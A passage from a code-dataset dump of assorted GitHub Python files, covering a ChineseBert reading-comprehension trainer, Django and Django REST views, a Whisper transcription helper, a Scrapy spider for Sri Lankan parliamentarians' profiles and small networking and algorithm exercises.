batch):\n input_ids, pinyin_ids, input_mask, span_mask, segment_ids, start, end = batch\n batch_size, length = input_ids.shape\n pinyin_ids = pinyin_ids.view(batch_size, length, 8)\n # attention mask\n attention_mask = (input_ids != 0).long()\n output = self.model(input_ids, pinyin_ids, attention_mask=attention_mask,\n token_type_ids=segment_ids, start_positions=start, end_positions=end)\n return output\n\n def training_step(self, batch, batch_idx):\n \"\"\"\"\"\"\n output = self.compute_loss_and_acc(batch)\n loss = output[0]\n tf_board_logs = {\n \"train_loss\": loss,\n \"lr\": self.trainer.optimizers[0].param_groups[0]['lr']\n }\n return {'loss': loss, 'log': tf_board_logs}\n\n def validation_step(self, batch, batch_idx):\n \"\"\"\"\"\"\n output = self.compute_loss_and_acc(batch)\n loss = output[0]\n return {'val_loss': loss}\n\n def validation_epoch_end(self, outputs):\n \"\"\"\"\"\"\n avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n tensorboard_logs = {'val_loss': avg_loss}\n print(avg_loss)\n return {'val_loss': avg_loss, 'log': tensorboard_logs}\n\n def train_dataloader(self) -> DataLoader:\n return self.get_dataloader(\"train\")\n\n def val_dataloader(self):\n return self.get_dataloader(\"dev\")\n\n def get_dataloader(self, prefix=\"train\") -> DataLoader:\n \"\"\"get training dataloader\"\"\"\n dataset = CMRC2018Dataset(directory=self.args.data_dir, prefix=prefix)\n dataloader = DataLoader(\n dataset=dataset,\n batch_size=self.args.batch_size,\n num_workers=self.args.workers,\n shuffle=True\n )\n return dataloader\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=\"Training\")\n parser.add_argument(\"--bert_path\", required=True, type=str, help=\"bert config file\")\n parser.add_argument(\"--batch_size\", type=int, default=8, help=\"batch size\")\n parser.add_argument(\"--lr\", type=float, default=3e-5, help=\"learning rate\")\n parser.add_argument(\"--workers\", type=int, default=4, help=\"num workers for dataloader\")\n parser.add_argument(\"--weight_decay\", default=0.0, type=float, help=\"Weight decay if we apply some.\")\n parser.add_argument(\"--adam_epsilon\", default=1e-8, type=float, help=\"Epsilon for Adam optimizer.\")\n parser.add_argument(\"--warmup_steps\", default=0, type=int, help=\"warmup steps\")\n parser.add_argument(\"--use_memory\", action=\"store_true\", help=\"load datasets to memory to accelerate.\")\n parser.add_argument(\"--max_length\", default=512, type=int, help=\"max length of datasets\")\n parser.add_argument(\"--data_dir\", required=True, type=str, help=\"train data path\")\n parser.add_argument(\"--save_path\", required=True, type=str, help=\"train data path\")\n parser.add_argument(\"--save_topk\", default=1, type=int, help=\"save topk checkpoint\")\n parser.add_argument(\"--warmup_proporation\", default=0.01, type=float, help=\"warmup proporation\")\n return parser\n\n\ndef main():\n \"\"\"main\"\"\"\n parser = get_parser()\n parser = Trainer.add_argparse_args(parser)\n args = parser.parse_args()\n\n if not os.path.exists(args.save_path):\n os.mkdir(args.save_path)\n\n model = CMRCTask(args)\n\n checkpoint_callback = ModelCheckpoint(\n filepath=os.path.join(args.save_path, 'checkpoint', '{epoch}-{val_loss:.4f}'),\n save_top_k=args.save_topk,\n save_last=False,\n monitor=\"val_loss\",\n mode=\"min\",\n )\n logger = TensorBoardLogger(\n save_dir=args.save_path,\n name='log'\n )\n\n # save args\n with open(os.path.join(args.save_path, 'checkpoint', \"args.json\"), 'w') as f:\n args_dict = args.__dict__\n del args_dict['tpu_cores']\n json.dump(args_dict, f, indent=4)\n\n trainer = Trainer.from_argparse_args(args,\n checkpoint_callback=checkpoint_callback,\n distributed_backend=\"ddp\",\n logger=logger)\n\n trainer.fit(model)\n\n\nif __name__ == '__main__':\n from multiprocessing import freeze_support\n\n freeze_support()\n main()\n","repo_name":"ShannonAI/ChineseBert","sub_path":"tasks/CMRC/cmrc_trainer.py","file_name":"cmrc_trainer.py","file_ext":"py","file_size_in_byte":7324,"program_lang":"python","lang":"en","doc_type":"code","stars":505,"dataset":"github-code","pt":"47"} +{"seq_id":"23862835067","text":"#!/bin/python\n\nfrom itertools import combinations, permutations\nfrom itertools import takewhile, dropwhile\nfrom sets import Set\nfrom copy import copy\nimport networkx as nx\n\nclass Downscaler():\n def __init__( self, emu_nodes, graph):\n self.emu_nodes = emu_nodes \n self.graph = graph\n \n self.paths = []\n self.get_paths()\n\n def get_paths( self ):\n for flow in self.emu_nodes:\n path = nx.shortest_path( self.graph, flow['src'], flow['dest'] )\n\n node_types = nx.get_node_attributes( self.graph, 'type' )\n for p in path:\n if node_types.get( p ) != 'interface':\n path.remove( p )\n \n path1 = path[0:][::2]\n path2 = path[1:][::2]\n path2.reverse()\n \n path1id = int( flow['id'] )\n path2id = path1id + 1\n \n self.paths.append( {'id': path1id, 'path': path1} )\n self.paths.append( {'id': path2id, 'path': path2} )\n\n return self.paths\n\n def get_pipes( self ):\n pipes = []\n\n path_perms = []\n for path in self.paths:\n path_perms.append( set( path['path'] ) )\n\n intersections = []\n for p in permutations( path_perms, 2 ):\n temp = set( p[0] ) & set( p[1] )\n if len( temp ) != 0:\n try:\n intersections.index( temp )\n except:\n intersections.append( temp )\n pipes.append( temp )\n\n for path in self.paths:\n for inter in intersections:\n temp = set( path['path'] ) - inter\n if len( temp ) != 0 and temp != set( path['path'] ):\n try:\n pipes.index( temp )\n except:\n pipes.append( temp )\n\n if len( pipes ) == 0:\n pipes = copy( path_perms ) \n\n i = 0\n for i in range( len( pipes ) ):\n pipes[i] = list( pipes[i] )\n\n return pipes\n","repo_name":"IAmMadSlave/conflux-mininet","sub_path":"symbiosim-study/src/final/src/Downscaler.py","file_name":"Downscaler.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42638365327","text":"from multiprocessing import context\n\nimport plotly.express as px\nfrom django.shortcuts import get_object_or_404, render\nfrom plotly.offline import plot\n\nfrom core.models import CarouselImage\n\nfrom .models import Bicycle, Brand\n\n\ndef all_brands(request):\n brand_list = []\n carousel_list = []\n\n bbrand_query = Brand.objects.all()\n carousel_query = CarouselImage.objects.all()\n for brd in bbrand_query:\n brand_list.append(brd)\n for car in carousel_query:\n carousel_list.append(car)\n context = {\n 'brand_query': brand_list,\n 'carousel_query': carousel_list\n }\n\n return render(request, 'collection/brand.html', context)\n\n\ndef brand_detail(request, slug):\n\n bike_query = None\n\n try:\n brand = get_object_or_404(Brand, slug=slug)\n except:\n brand = False\n\n if brand:\n bike_query = brand.bicycle_set.all()\n\n context = {\n 'brand_obj': brand,\n 'bike_query': bike_query,\n 'brand_slug': slug,\n }\n\n return render(request, 'collection/brand_detail.html', context)\n\n\ndef bike_detail(request, bikeslug, brandslug=None):\n\n bike_photo_query = None\n\n try:\n bike = get_object_or_404(Bicycle, slug=bikeslug)\n except:\n bike = False\n\n if bike:\n bike_photo_query = bike.photo_set.all()\n\n context = {\n 'bikeslug': bikeslug,\n 'bike': bike,\n 'bike_photos': bike_photo_query,\n }\n\n return render(request, 'collection/bike_detail.html', context)\n\ndef slider_mobile(request):\n return render(request, 'collection/slider.html')","repo_name":"brunodutraa/vintage_bicycle_collection","sub_path":"collection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43514283055","text":"\nimport whisper\nimport sys\n\nmodel = whisper.load_model(\"tiny.en\")\n\n# for only english\ndef transcribe(au_path) :\n \n result = model.transcribe(au_path)\n \n return result[\"text\"]\n\n# for all lang\ndef transcribe_mul_lang(au_path):\n model = whisper.load_model(\"base\")\n\n # load audio and pad/trim it to fit 30 seconds\n audio = whisper.load_audio(au_path)\n audio = whisper.pad_or_trim(audio)\n\n # make log-Mel spectrogram and move to the same device as the model\n mel = whisper.log_mel_spectrogram(audio).to(model.device)\n\n # detect the spoken language\n _, probs = model.detect_language(mel)\n print(f\"Detected language: {max(probs, key=probs.get)}\")\n\n # decode the audio\n options = whisper.DecodingOptions()\n result = whisper.decode(model, mel, options)\n\n # print the recognized text\n return result.text\n\n\n\ndef reg(au_path , type=\"none\"):\n if type==\"none\":\n res = transcribe(au_path)\n elif type==\"mul\":\n res = transcribe_mul_lang(au_path)\n return res\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n au_path = sys.argv[1]\n print(\"input audio path :\", au_path)\n else:\n au_path = input(\"Enter audio path : \")\n print(\"input audio path :\", au_path)\n pmt = transcribe(au_path)\n print(pmt)\n \n\n\n \n\n\n\n\n\n\n\n \n \n\n","repo_name":"Lokeshwaran-M/lok-lib","sub_path":"loklib/speech_reg.py","file_name":"speech_reg.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"35907248202","text":"import os\n\nfrom torch.utils.data import Dataset\nfrom torchvision.datasets.folder import default_loader\n\nfrom uvcgan2.consts import SPLIT_TRAIN\nfrom .image_domain_folder import ImageDomainFolder\n\nclass ImageDomainHierarchy(Dataset):\n\n def __init__(\n self, path, domain,\n split = SPLIT_TRAIN,\n transform = None,\n **kwargs\n ):\n super().__init__(**kwargs)\n\n self._path = os.path.join(path, split, domain)\n self._imgs = ImageDomainFolder.find_images_in_dir(self._path)\n self._transform = transform\n\n def __len__(self):\n return len(self._imgs)\n\n def __getitem__(self, index):\n path = self._imgs[index]\n result = default_loader(path)\n\n if self._transform is not None:\n result = self._transform(result)\n\n return result\n\n","repo_name":"KayceeSamuel/uvcGAN2_custom","sub_path":"uvcgan2-main/uvcgan2/data/datasets/image_domain_hierarchy.py","file_name":"image_domain_hierarchy.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16300575319","text":"# The main code to test the methods of Queue functionality\n\n\nimport lineards\n\nif __name__ == '__main__':\n obj_Q = lineards.Queue()\n \n while True:\n inp = input(\"Press 0: exit, 1: Enqueue, 2: Dequeue, 3: Is empty ?, 4: Queue size ? :\")\n\n if(int(inp) == 0):\n break\n elif(int(inp) == 1):\n num = input(\"Enter no to Enqueue : \")\n obj_Q.enqueue(int(num))\n elif(int(inp) == 2):\n item = obj_Q.dequeue()\n print(\"Item dequeued : \" + str(item))\n elif(int(inp)==3):\n if obj_Q.isEmpty():\n print(\"Queue is empty\")\n else:\n print(\"Queue not empty\")\n elif(int(inp) == 4):\n print(\"Queue Size : \", obj_Q.size()) \n else:\n inp = input(\"Press 0: exit, 1: Enqueue, 2: Dequeue, 3: Is empty ?, 4: Queue size ? :\")","repo_name":"anjanikeshari/dsalgo","sub_path":"testQueue.py","file_name":"testQueue.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"7922150763","text":"import scrapy\nimport json \nimport re\n\nclass MinisterScrape(scrapy.Spider):\n name = \"ministers\"\n objects = []\n minister_name = \"\"\n position = \"\"\n party = \"\"\n district = \"\"\n contact_information = []\n related_subjects = []\n participated_in_parliament = \"\"\n overall_rank = \"\"\n biography = \"\"\n idx = -1\n\n allowed_domains= [\n 'manthri.lk'\n ]\n\n \n def start_requests(self):\n urls = [\n \"http://www.manthri.lk/si/politicians\",\n ]\n base = \"http://www.manthri.lk/si/politicians?page=\"\n for i in range(2,10):\n urls.append(base+str(i))\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n print(url)\n \n \n\n def parse(self, response):\n\n for quote in response.xpath('/html/body/div[2]/div/div[1]/ul[1]/li/h4/a/@href').getall():\n quote = \"http://www.manthri.lk/\"+quote\n related_subjects_l = []\n yield scrapy.Request(quote, callback=self.details_extractor,cb_kwargs=dict(related_subjects_l = related_subjects_l))\n \n def details_extractor(self, response, related_subjects_l):\n t = response.xpath('/html/body/div[2]/div/div/div[1]/div[6]/table')\n if len(t) == 0:\n related_subjects_l = []\n load_more = None\n else:\n table = response.xpath('/html/body/div[2]/div/div/div[1]/div[6]/table')[0]\n for subject in table.xpath('//tbody/tr/td[3]/ul/li/a/text()').getall():\n related_subjects_l.append(subject)\n load_more = response.xpath('/html/body/div[2]/div/div/div[1]/div[6]/div/a/@href').get()\n if load_more is not None:\n load_more = \"http://www.manthri.lk/\" + load_more\n yield scrapy.Request(load_more, callback=self.details_extractor,cb_kwargs=dict(related_subjects_l = related_subjects_l))\n else:\n self.idx += 1\n self.related_subjects = list(set(related_subjects_l))\n self.minister_name= response.xpath('/html/body/div[2]/section/div/div/div[2]/h1/text()').get().strip().replace(\" \", \" \")\n p = response.xpath('/html/body/div[2]/section/div/div/div[2]/p/text()').get()\n if p is not None:\n self.position=\" , \".join(response.xpath('/html/body/div[2]/section/div/div/div[2]/p/text()').get().strip().split(\"-\"))\n else:\n self.position= \"පාර්ලිමේන්තු මන්ත්‍රී\"\n self.party = response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[1]/text()[1]').get().strip().split(\",\")[0]\n self.district = response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[1]/a/text()').get().strip()\n contact_l = []\n contact_l.append(response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[2]/span[1]/text()').get().strip())\n if response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[2]/span[2]/a/text()').get() is not None:\n contact_l.append(response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[2]/span[2]/a/text()').get().strip())\n self.contact_information = contact_l\n\n self.overall_rank= response.xpath('/html/body/div[2]/div/div/div[1]/div[2]/div[1]/span/strong/text()').get().strip()[1:]\n self.participated_in_parliament = response.xpath('/html/body/div[2]/div/div/div[1]/div[2]/div[3]/span/strong/text()').get().strip()\n\n bio_string = \"\"\n \n table_personal = response.xpath('/html/body/div[2]/div/div/div[1]/div[8]/table[1]/tbody/tr')\n for i in range(len(table_personal)-1,-1,-1):\n key = table_personal[i].xpath('./td[1]/text()').get().strip()\n value = table_personal[i].xpath('./td[2]/text()').get().strip()\n if key == \"ස්ත්‍රී පුරුෂ භාවය:\":\n gender = value\n if \"හිමි\" in self.minister_name:\n pro_noune1 = \"\"\n pro_noune2 = \"උන්වහන්සේ \"\n if gender == \"පුරුෂ\" or gender == \"පිරිමි\" or gender == \"male\":\n pro_noune1 = \"මහතා\"\n pro_noune2 = \"මෙතුමා \"\n elif gender == \"ස්ත්‍රී\" or gender == \"ගැහැණු\" or gender == \"female\":\n pro_noune1 = \"මහත්මිය\"\n pro_noune2 = \"මෙතුමිය \" \n elif key == \"උපන්දිනය:\" and value is not None:\n birthday = value\n birthday_string = self.minister_name + \" \"+ pro_noune1 + \" \" + birthday + \" \" + \"දින උපත ලබා ඇත.\" \n bio_string += birthday_string\n\n table_edu = response.xpath('/html/body/div[2]/div/div/div[1]/div[8]/table[2]/tbody/tr')\n schools = \"\"\n edu_string = \"\"\n for i in range(len(table_edu)):\n key = table_edu[i].xpath('./td[1]/text()').get()\n value = table_edu[i].xpath('./td[2]/text()').get()\n if value is None:\n continue\n else:\n if \"පාසැල\" in key:\n if edu_string == \"\": \n schools += value\n edu_string = pro_noune2 + schools + \" යන පාසලේ අධ්යාපනය ලබා ඇත.\"\n else:\n schools += \"; \"+value+\"; \"\n edu_string = pro_noune2 + schools + \" යන පාසල්වල අධ්යාපනය ලබා ඇත.\"\n elif \"ප්‍රථම උපාධිය\" in key:\n edu_string += \"තම ප්‍රථම උපාධිය \"+value+\" ලබාගෙන ඇත.\"\n elif \"පශ්චාත් උපාධිය\" in key:\n edu_string += \" ඊට අමතරව \"+ value +\" පශ්චාත් උපාධිය ද සම්පූර්ණ කර ඇත.\"\n \n bio_string += edu_string\n\n table_party = response.xpath('/html/body/div[2]/div/div/div[1]/div[8]/table[3]/tbody/tr')\n party_string = \"\" \n j = \"\" \n for i in range(len(table_party)):\n if i>0:\n j = \"ද\"\n if i == 1:\n party_string+=j+\" \"\n duration = table_party[i].xpath('./td[1]/text()').get()\n party = table_party[i].xpath('./td[2]').get().split(\">\")[-2].split(\",\")[0].strip()\n if duration is not None and party is not None:\n if \"සිට\" not in duration:\n try:\n start,end = duration.split(\" - \")\n party_string += start+\" සිට \"+end+\" දක්වා \"+party+j\n except:\n party_string += duration+\" පටන්\"+party+j\n else:\n party_string += duration+\" \"+party+j\n party_string += \" නියෝජනය කරමින් පාර්ලිමේන්තුවේ අසුන් ගෙන සිටී.\"\n\n bio_string += party_string\n\n self.biography = bio_string\n\n details= {\n 'name' : self.minister_name ,\n 'position' : self.position ,\n 'party' : self.party , \n 'district' : self.district ,\n 'contact_information' : self.contact_information ,\n 'overall_rank' : self.overall_rank ,\n 'participated_in_parliament' : self.participated_in_parliament ,\n 'related_subjects' : self.related_subjects,\n 'biography' : self.biography\n }\n\n with open(\"data/\"+str(self.idx)+\".json\", 'w', encoding=\"utf8\") as outfile:\n json.dump([details], outfile,indent = 4,ensure_ascii=False)\n self.objects.append(details)\n \n \n def closed(self, reason):\n with open(\"data.json\", 'w', encoding=\"utf8\") as outfile:\n json.dump(self.objects, outfile,indent = 4,ensure_ascii=False)","repo_name":"Thisun1997/Web-Scraper","sub_path":"crawler/spiders/ministers.py","file_name":"ministers.py","file_ext":"py","file_size_in_byte":8024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11792971917","text":"# @Time : 2020/06/09\n# @Author : sunyingqiang\n# @Email : 344670075@qq.com\nfrom rest_framework.viewsets import GenericViewSet\nfrom rest_framework import mixins\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom Apps.User.serializers.user_address_serializers import UserAddressSerializer\nfrom Apps.User.models import Address\nfrom drf_shop import contants\n\n\nclass UserAddressViewSet(mixins.ListModelMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n GenericViewSet):\n \"\"\"用户地址视图类\"\"\"\n\n serializer_class = UserAddressSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n return self.request.user.addresses.filter(is_deleted=False)\n\n\n def list(self, request, *args, **kwargs):\n \"\"\"展示用户地址\"\"\"\n queryset = self.get_queryset()\n serializer = self.get_serializer(queryset, many=True)\n user = self.request.user\n return Response({\n 'user_id': user.id,\n 'default_address_id': user.default_address_id,\n 'limit': contants.USER_ADDRESS_COUNTS_LIMIT,\n 'addresses': serializer.data\n })\n\n\n def create(self, request, *args, **kwargs):\n \"\"\"创建用户地址\"\"\"\n count = request.user.addresses.count()\n if count >= contants.USER_ADDRESS_COUNTS_LIMIT:\n return Response({'message': '保存地址数据已达到上限'}, status.HTTP_400_BAD_REQUEST)\n\n return super().create(self, request, *args, **kwargs)\n\n\n def destroy(self, request, *args, **kwargs):\n \"\"\"地址删除\"\"\"\n address = self.get_object()\n address.is_deleted = True\n address.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n @action(methods=['put'], detail=True)\n def status(self, request, pk=None):\n \"\"\"设置默认地址 url:/api/user/address//status/\"\"\"\n address = self.get_object()\n request.user.default_address = address\n request.user.save()\n return Response({'message': 'OK'}, status=status.HTTP_200_OK)\n\n\n @action(methods=['put'], detail=True)\n def title(self, request, pk=None):\n \"\"\"修改标题 url:/api/user/address//title/\"\"\"\n address = self.get_object()\n serializer = UserAddressSerializer(instance=address, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n\n\n\n\n","repo_name":"supermouse123/drf_api","sub_path":"drf_shop/Apps/User/views/user_address.py","file_name":"user_address.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"4699350387","text":"start = 1634515200\nend = start + 7 * 24 * 60 * 60\n\nwith open('26(1).txt', 'r') as f:\n all_vals = [[max(int(i.split()[0]), start), min(int(i.split()[1]), end)] for i in f if len(i.split()) > 1]\n\nstarts = []\nends = []\nfor i in range(len(all_vals)):\n if all_vals[i][1] == 0:\n ends.append(end)\n else:\n ends.append(all_vals[i][1])\n\n starts.append(all_vals[i][0])\nc = 0\nres = []\nmax_val = 0\ntimer = 0\nmax_time = 0\nfor i in range(start, end):\n c += starts.count(i)\n c -= ends.count(i)\n if c == max_val:\n timer += 1\n elif c > max_val:\n timer = 1\n max_time = max(max_time, timer)\n max_val = max(c, max_val)\n\nprint(max_val, max_time)\n","repo_name":"benzlokzik/ege-oge-ikt-informatics","sub_path":"unsorted 2022 and older files/ege_2022/15.06.2022/26.41001.py","file_name":"26.41001.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29234423436","text":"n, k = map(int, input().split())\nisPrimeList = [False, False] + [True] * (n - 1)\n\ncnt = 0\nfor i in range(2, n + 1):\n for j in range(i, n + 1, i):\n if isPrimeList[j]:\n cnt += 1\n if cnt == k:\n print(j)\n exit(0)\n isPrimeList[j] = False\n","repo_name":"codingNoob12/algorithm-study","sub_path":"BOJ/silver4/2023-02-16/2960.py","file_name":"2960.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12625959938","text":"import Util\n\nimport os\nimport shutil\n\nfrom avocado.utils import archive, build, process\n\nfrom avocado import Test\n\nclass SetUpNoTar(Util.GuacTest): \n\n\n def test_clear_work(self):\n self._guac_handler(self._test_clear_work)\n \n def _test_clear_work(self):\n \"\"\"\n :param HOME: test directory\n \"\"\"\n desc={\"Description\":\"Clearing working directory\"}\n self._write_whiteboard_yaml(desc)\n #\n home = self._safe_param(\"HOME\")\n work = Util.get_work_dir(home)\n\n shutil.rmtree(work)\n os.makedirs(work)\n #\n\n def test_file_exists(self):\n self._guac_handler(self._test_file_exists)\n \n def _test_file_exists(self):\n \"\"\"\n :avocado: tags=tar_exists \n :param STUDENT\n :param HOME\n :param ASSIGNMENT\n \"\"\"\n \n desc={\"Description\":\"Testing submission exists\"}\n self._write_whiteboard_yaml(desc)\n\n file_loc = self._file_location()\n #\n \n file_desc={\"Message\":f\"Grading {os.path.basename(file_loc)}\"}\n # \"Contents\":Util.list_tar_contents(tar_loc)}\n self._write_whiteboard_yaml(file_desc)\n \n #\n\n def test_copy_file(self):\n self._guac_handler(self._test_copy_file)\n \n def _test_copy_file(self):\n \"\"\"\n :avocado: tags=extract_tar\n :param STUDENT\n :param HOME\n :param ASSIGNMENT\n :param FILE_TYPE\n :param FILE_NAME\n \"\"\"\n \n # the config var FILE_NAME is the name the file should have in work\n # the (optional) env var FILE_NAME is the file to use for grading in ~/Checkin/{ASSIGNMENT}/{STUDENT}/\n\n desc={\"Description\":\"Moving submission to working directory\"}\n self._write_whiteboard_yaml(desc)\n #\n work=Util.get_work_dir(self._safe_param(\"HOME\"))\n file_loc=self._file_location()\n file_name=self._safe_param(\"FILE_NAME\")\n shutil.copy(file_loc,os.path.join(work,file_name))\n\n # not the best, should find a better solution, or a better standard\n #assignment_dir=os.path.join(work,self._safe_param(\"ASSIGNMENT\"))\n #if os.path.isdir(assignment_dir):\n # for el in os.listdir(assignment_dir):\n # shutil.move(os.path.join(assignment_dir,el),os.path.join(work,el))\n \n #\n\n\n def test_copy_lib_contents(self):\n self._guac_handler(self._test_copy_lib_contents)\n \n def _test_copy_lib_contents(self):\n \"\"\"\n :param STUDENT\n :param HOME\n :param ASSIGNMENT\n :param LIB_CONTENTS\n \"\"\"\n \n lib_contents=self.params.get(\"LIB_CONTENTS\",default=[])\n desc={\"Description\":\"Copying into working directory\",\n \"LIB_CONTENTS\":lib_contents}\n self._write_whiteboard_yaml(desc)\n \n home = self._safe_param(\"HOME\")\n srcdir = Util.get_work_dir(home)\n libdir = os.path.join(home,\"lib\")\n \n for book in lib_contents:\n shutil.copyfile(os.path.join(libdir,book),os.path.join(srcdir,book))\n # \n \n def _file_location(self):\n sub_home=self._safe_param(\"SUBMISSION_HOME\")\n assignment=self._safe_param(\"ASSIGNMENT\")\n student=self._safe_param(\"STUDENT\")\n file_type=self._safe_param(\"FILE_TYPE\")\n\n file_loc,status,_ = Util.file_location(sub_home,assignment,student,file_type)\n\n if status==\"Missing\" or file_loc==None: # should be true at the same time\n self.fail(\"Missing submission\")\n\n return file_loc\n","repo_name":"WilliamScarbro/guac","sub_path":"src/SetUpNoTar.py","file_name":"SetUpNoTar.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2372704826","text":"'''\nCreated on Feb 13, 2013\n\n@author: cmcculloch\n'''\nimport wx\nfrom TestThread import TestThread\nimport threading\nfrom copy import copy\nfrom CustomEvents import ResultEvent, StopEvent, ProgressEvent\nfrom CustomEvents import EndStepEvent\n\n\nclass Bundle():\n '''\n A bundle object contains all the necessary information to run tests on the\n test system.\n '''\n def __init__(self, output, parent):\n '''\n Initialize the internal data.\n '''\n self.parameters = None\n self.module = None\n self.limits = None\n self.validate = None\n self.uutCom = None\n self.db = None\n self.__testData = [] # List of { \"TestName\" : [Test, Results] }\n self.__testCode = [] # List of pre-compiled test code\n self.testResult = None # Temp store test results (after limit check)\n self.testResponse = None # Temp store UUT response to test\n self.testLimits = None # Temp hold limits object (holds units, etc)\n self.moduleData = None # Temp store of any test data generated\n self.__testName = \"\" # Full name of test\n self.__testThread = None # Thread running the test\n self.__guiOutput = output # Point to GUI output text control\n self.__parent = parent # Parent window\n self.__message = \"\" # Message from GUI\n self.__validMessage = False # Flag for a valid message present\n self.__msgLock = threading.Lock() # Message lock\n self.__validMsgLock = threading.Lock() # Flag lock\n self.__notifyThread = None # Will be the notification thread\n \n \n def haveMessage(self):\n '''\n Return True if a message is ready for the test thread from GUI.\n '''\n return self.__validMessage\n\n\n def getMessage(self):\n '''\n Return the message and reset flags.\n '''\n self.__msgLock.acquire()\n msg = copy(self.__message) # Make a copy that is thread safe\n self.__message = \"\" # Reset the message\n self.__msgLock.release()\n\n self.__validMsgLock.acquire()\n self.__validMessage = False\n self.__validMsgLock.release()\n return msg\n \n \n def setMessage(self, msg, wait = False):\n '''\n Set the message from GUI to test thread.\n '''\n self.__msgLock.acquire()\n self.__message = copy(msg) # Make a copy that is thread safe\n self.__msgLock.release()\n \n self.__validMsgLock.acquire()\n self.__validMessage = True\n self.__validMsgLock.release()\n \n if wait: # Wait until other thread got the message\n flag = False\n while not flag: # TODO: Should have a timeout here?\n self.__validMsgLock.acquire()\n if not self.__validMessage: # Other thread got message\n flag = True\n self.__validMsgLock.release()\n \n return msg\n\n \n def output(self, text):\n '''\n Send the text to the GUI text control via an event handler.\n This is thread-safe.\n '''\n wx.PostEvent(self.__parent, ResultEvent(\"%s\\n\" % text))\n\n\n def stop(self, text):\n '''\n Send a signal to stop the test.\n '''\n wx.PostEvent(self.__parent, StopEvent(\"%s\\n\" % text))\n self.__testThread = None\n self.__testCode = [] # To force full reload next time we execute\n \n \n def isTestRunning(self):\n ''' Return true if the test thread is active and running. '''\n state = False\n if self.__testThread is not None:\n state = True\n return state\n \n \n def packTestData(self, state = True):\n '''\n If state is True, then Store all test results, response, limits, etc.\n in testData[], otherwise do nothing.\n '''\n if state:\n self.__testData.append({ self.__testName :\n { \"response\" : self.testResponse ,\n \"limits\" : self.testLimits,\n \"result\" : self.testResult }\n })\n \n \n def load(self, parameters, module, validate, limits):\n ''' Load the bundle with the test functions '''\n self.parameters = parameters\n self.module = module\n self.validate = validate\n self.limits = limits\n \n \n def start(self):\n '''\n Start the module test code.\n '''\n if self.__testThread is None:\n self.__testThread = TestThread(self.__testCode, self)\n self.__testThread.start()\n else:\n raise RuntimeError(\"Test thread was not deleted properly\")\n \n \n \n def setUUTCom(self, uutCom):\n ''' Initialize the uutCom object '''\n self.uutCom = uutCom\n \n \n def setDB(self, db):\n ''' Initialize the database object '''\n self.db = db\n \n \n def setTestName(self, name):\n '''\n Set the name of the test. This name will be used to store all the\n test data and test results from the test.\n '''\n self.__testName = name\n \n \n def appendCompiledModule(self, module):\n '''\n Append the compiled module to the list to be run later.\n '''\n self.__testCode.append(module)\n \n\n def incrementProgress(self):\n '''\n Increment the progress bar in the GUI.\n '''\n wx.PostEvent(self.__parent, ProgressEvent(None))\n\n\n def setNotificationThread(self, notifyThread):\n '''\n Sets the notification thread so that the test code can modify the\n state of the notifications when necessary.\n '''\n self.__notifyThread = notifyThread\n \n \n def DBNotify(self):\n '''\n Toggle the database notification icon.\n '''\n self.__notifyThread.setMsg(\"DATABASE\")\n \n \n def networkNotify(self, state):\n '''\n Set the network notification icon according to state parameter.\n '''\n if state:\n self.__notifyThread.setMsg(\"NETWORK ON\")\n else:\n self.__notifyThread.setMsg(\"NETWORK OFF\")\n\n\n def endStep(self):\n '''\n Tell the GUI that the step is over.\n '''\n wx.PostEvent(self.__parent, EndStepEvent(True))","repo_name":"pyridoxus/cthulu-public","sub_path":"Bundle.py","file_name":"Bundle.py","file_ext":"py","file_size_in_byte":6513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"44861540036","text":"from socket import *;\r\nserverPort = 12000\r\nserverName = 'DESKTOP-9CJQB77'\r\nserverSocket = socket(AF_INET,SOCK_STREAM)\r\nserverSocket.bind((serverName,serverPort))\r\nserverSocket.listen(1)\r\nprint(\"The server is ready to receive\")\r\nwhile 1:\r\n connectionSocket,addr = serverSocket.accept()\r\n file_1 = connectionSocket.recv(1024)\r\n file = open(file_1,'r')\r\n file2 = file.read(1024)\r\n connectionSocket.send(file2)\r\n file.close()\r\n 